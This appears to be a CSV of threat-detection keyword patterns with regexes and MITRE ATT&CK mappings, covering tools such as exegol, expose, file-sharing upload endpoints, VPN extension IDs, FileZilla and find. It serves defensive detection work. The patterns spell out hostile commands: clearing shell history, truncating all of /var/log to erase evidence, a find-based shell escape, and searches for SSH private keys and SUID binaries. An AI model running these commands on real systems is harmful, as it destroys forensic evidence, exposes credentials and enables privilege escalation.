"*screen /dev/ttyACM0 115200*",".{0,1000}screen\s\/dev\/ttyACM0\s115200.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*snmpwalk -c public -v 1 *",".{0,1000}snmpwalk\s\-c\spublic\s\-v\s1\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*snmpwalk -c public -v 2c *",".{0,1000}snmpwalk\s\-c\spublic\s\-v\s2c\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*tailscale up --advertise-routes=*/24*",".{0,1000}tailscale\sup\s\-\-advertise\-routes\=.{0,1000}\/24.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*tailscaled --tun=userspace-networking --socks5-server=*",".{0,1000}tailscaled\s\-\-tun\=userspace\-networking\s\-\-socks5\-server\=.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*volatility2 --profile=*",".{0,1000}volatility2\s\-\-profile\=.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*volatility3 -f *.dmp*",".{0,1000}volatility3\s\-f\s.{0,1000}\.dmp.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*vulny-code-static-analysis --dir *",".{0,1000}vulny\-code\-static\-analysis\s\-\-dir\s.{0,1000}","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","1828","181","2024-08-27T14:05:45Z","2020-03-09T19:12:11Z"
"*export HISTFILE=/dev/null*",".{0,1000}export\sHISTFILE\=\/dev\/null.{0,1000}","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*export HISTFILESIZE=0*",".{0,1000}export\sHISTFILESIZE\=0.{0,1000}","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*export HISTSIZE=0*",".{0,1000}export\sHISTSIZE\=0.{0,1000}","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"* /usr/local/bin/expose*",".{0,1000}\s\/usr\/local\/bin\/expose.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z"
"*/expose/database/expose.db*",".{0,1000}\/expose\/database\/expose\.db.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","1","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z"
"*/expose/raw/master/builds/expose*",".{0,1000}\/expose\/raw\/master\/builds\/expose.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","1","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z"
"*/src/expose serve *",".{0,1000}\/src\/expose\sserve\s.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z"
"*beyondcode/expose*",".{0,1000}beyondcode\/expose.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","1","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z"
"*docker build -t expose *",".{0,1000}docker\sbuild\s\-t\sexpose\s.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z"
"*docker run expose *",".{0,1000}docker\srun\sexpose\s.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z"
"*expose share http://*",".{0,1000}expose\sshare\shttp\:\/\/.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z"
"*exposeConfigPath=/src/config/expose.php*",".{0,1000}exposeConfigPath\=\/src\/config\/expose\.php.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z"
"*'host' => 'sharedwithexpose.com'*",".{0,1000}\'host\'\s\=\>\s\'sharedwithexpose\.com\'.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z"
"*http://127.0.0.1:4040/api/logs/*",".{0,1000}http\:\/\/127\.0\.0\.1\:4040\/api\/logs\/.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","1","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z"
"*https://expose.dev/api/servers*",".{0,1000}https\:\/\/expose\.dev\/api\/servers.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","1","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z"
"*https://expose.dev/register*",".{0,1000}https\:\/\/expose\.dev\/register.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","1","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z"
"*fgddmllnllkalaagkghckoinaemmogpe*",".{0,1000}fgddmllnllkalaagkghckoinaemmogpe.{0,1000}","greyware_tool_keyword","ExpressVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*jedieiamjmoflcknjdjhpieklepfglin*",".{0,1000}jedieiamjmoflcknjdjhpieklepfglin.{0,1000}","greyware_tool_keyword","FastestVPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*bblcccknbdbplgmdjnnikffefhdlobhp*",".{0,1000}bblcccknbdbplgmdjnnikffefhdlobhp.{0,1000}","greyware_tool_keyword","FastStunnel VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*https://*.fex.net/download/*",".{0,1000}https\:\/\/.{0,1000}\.fex\.net\/download\/.{0,1000}","greyware_tool_keyword","fex.net","hosting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Collection","https://fex.net","1","1","N/A","downloading a file","10","10","N/A","N/A","N/A","N/A"
"*https://*.fex.net/upload/*",".{0,1000}https\:\/\/.{0,1000}\.fex\.net\/upload\/.{0,1000}","greyware_tool_keyword","fex.net","hosting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Data Exfiltration","https://fex.net","1","1","N/A","uploading a file","10","10","N/A","N/A","N/A","N/A"
"*https://api.fex.net/api/v1/anonymous/file*",".{0,1000}https\:\/\/api\.fex\.net\/api\/v1\/anonymous\/file.{0,1000}","greyware_tool_keyword","fex.net","hosting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Data Exfiltration","https://fex.net","1","1","N/A","uploading a file","10","10","N/A","N/A","N/A","N/A"
"*/download/fiddler/fiddler-everywhere-windows*",".{0,1000}\/download\/fiddler\/fiddler\-everywhere\-windows.{0,1000}","greyware_tool_keyword","fiddler","fiddler - capture https requests","T1056 - T1040 - T1557","TA0009 - TA00010","N/A","N/A","Collection","https://www.telerik.com/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*/Fiddler Everywhere *.*.*.exe*",".{0,1000}\/Fiddler\sEverywhere\s.{0,1000}\..{0,1000}\..{0,1000}\.exe.{0,1000}","greyware_tool_keyword","fiddler","fiddler - capture https requests","T1056 - T1040 - T1557","TA0009 - TA00010","N/A","N/A","Collection","https://www.telerik.com/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*\Fiddler Everywhere *.*.*.exe*",".{0,1000}\\Fiddler\sEverywhere\s.{0,1000}\..{0,1000}\..{0,1000}\.exe.{0,1000}","greyware_tool_keyword","fiddler","fiddler - capture https requests","T1056 - T1040 - T1557","TA0009 - TA00010","N/A","N/A","Collection","https://www.telerik.com/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*https://www.telerik.com/download/fiddler/*",".{0,1000}https\:\/\/www\.telerik\.com\/download\/fiddler\/.{0,1000}","greyware_tool_keyword","fiddler","fiddler - capture https requests","T1056 - T1040 - T1557","TA0009 - TA00010","N/A","N/A","Collection","https://www.telerik.com/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*https://file.io/*",".{0,1000}https\:\/\/file\.io\/.{0,1000}","greyware_tool_keyword","file.io","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://file.io/?title=*",".{0,1000}https\:\/\/file\.io\/\?title\=.{0,1000}","greyware_tool_keyword","file.io","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*filetransfer.io/upload/*",".{0,1000}filetransfer\.io\/upload\/.{0,1000}","greyware_tool_keyword","filetransfer.io","uploading to filetransfer.io","T1105 - T1021 - T1560.003 - T1071.001 - T1071.002","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://filetransfer.io","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/FileZilla_*_sponsored-setup.exe*",".{0,1000}\/FileZilla_.{0,1000}_sponsored\-setup\.exe.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","1","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A"
"*/FileZilla_Server_*.deb*",".{0,1000}\/FileZilla_Server_.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","1","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A"
"*\FileZilla_*_sponsored-setup.exe*",".{0,1000}\\FileZilla_.{0,1000}_sponsored\-setup\.exe.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A"
"*\FILEZILLA_*_WIN64_SPONSO-*.pf*",".{0,1000}\\FILEZILLA_.{0,1000}_WIN64_SPONSO\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","8","9","N/A","N/A","N/A","N/A"
"*\FileZilla_*-setup.exe*",".{0,1000}\\FileZilla_.{0,1000}\-setup\.exe.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A"
"*\FileZilla_Server_*",".{0,1000}\\FileZilla_Server_.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A"
"*\Program Files\FileZilla FTP Client\*",".{0,1000}\\Program\sFiles\\FileZilla\sFTP\sClient\\.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A"
"*\Program Files\FileZilla Server*",".{0,1000}\\Program\sFiles\\FileZilla\sServer.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A"
"*\Software\WOW6432Node\FileZilla Client*",".{0,1000}\\Software\\WOW6432Node\\FileZilla\sClient.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","#registry","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A"
"*>FileZilla FTP Client<*",".{0,1000}\>FileZilla\sFTP\sClient\<.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","#productname","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A"
"*>FileZilla Server<*",".{0,1000}\>FileZilla\sServer\<.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","#productname","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A"
"*download.filezilla-project.org*",".{0,1000}download\.filezilla\-project\.org.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","1","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A"
"*Software\FileZilla*",".{0,1000}Software\\FileZilla.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A"
"*Win32/FileZilla_BundleInstaller*",".{0,1000}Win32\/FileZilla_BundleInstaller.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","8","9","N/A","N/A","N/A","N/A"
"*/???/???/f?n? /var/log -type f -exec /???/???/tr?????e -s 0 {} \*",".{0,1000}\/\?\?\?\/\?\?\?\/f\?n\?\s\/var\/log\s\-type\sf\s\-exec\s\/\?\?\?\/\?\?\?\/tr\?\?\?\?\?e\s\-s\s0\s\{\}\s\\.{0,1000}","greyware_tool_keyword","find","truncate every file under /var/log to size 0 - no log content = no forensic.","T1486 - T1553 - T1592.002 - T1081","TA0005 - TA0007 - TA0009","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*dir /a C:\pagefile.sys | findstr /R *",".{0,1000}dir\s\/a\sC\:\\pagefile\.sys\s\|\sfindstr\s\/R\s.{0,1000}","greyware_tool_keyword","find","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*find . -exec /bin/sh \; -quit*",".{0,1000}find\s\.\s\-exec\s\/bin\/sh\s\\\;\s\-quit.{0,1000}","greyware_tool_keyword","find","It can be used to break out from restricted environments by spawning an interactive system shell.","T1059.004 - T1219 - T1027","TA0002 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*find / -name authorized_keys *> /dev/null*",".{0,1000}find\s\/\s\-name\sauthorized_keys\s.{0,1000}\>\s\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -name id_dsa 2>*",".{0,1000}find\s\/\s\-name\sid_dsa\s2\>.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -name id_rsa *> /dev/null*",".{0,1000}find\s\/\s\-name\sid_rsa\s.{0,1000}\>\s\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -name id_rsa 2>*",".{0,1000}find\s\/\s\-name\sid_rsa\s2\>.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -perm /2000 -ls 2>/dev/null*",".{0,1000}find\s\/\s\-perm\s\/2000\s\-ls\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SGID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*find / -perm +4000 -type f 2>/dev/null*",".{0,1000}find\s\/\s\-perm\s\+4000\s\-type\sf\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*find / -perm +8000 -ls 2>/dev/null*",".{0,1000}find\s\/\s\-perm\s\+8000\s\-ls\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SGID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*find / -perm -2000",".{0,1000}find\s\/\s\-perm\s\-2000","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -perm -4000",".{0,1000}find\s\/\s\-perm\s\-4000","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -perm -4000 -type f *",".{0,1000}find\s\/\s\-perm\s\-4000\s\-type\sf\s.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*find / -perm -g=s",".{0,1000}find\s\/\s\-perm\s\-g\=s","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -perm -u=s",".{0,1000}find\s\/\s\-perm\s\-u\=s","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -perm -u=s -type f 2>/dev/null*",".{0,1000}find\s\/\s\-perm\s\-u\=s\s\-type\sf\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*find / -perm -u=s -type f -group */dev/null*",".{0,1000}find\s\/\s\-perm\s\-u\=s\s\-type\sf\s\-group\s.{0,1000}\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*find / -uid 0 -perm -4000 -type f *",".{0,1000}find\s\/\s\-uid\s0\s\-perm\s\-4000\s\-type\sf\s.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
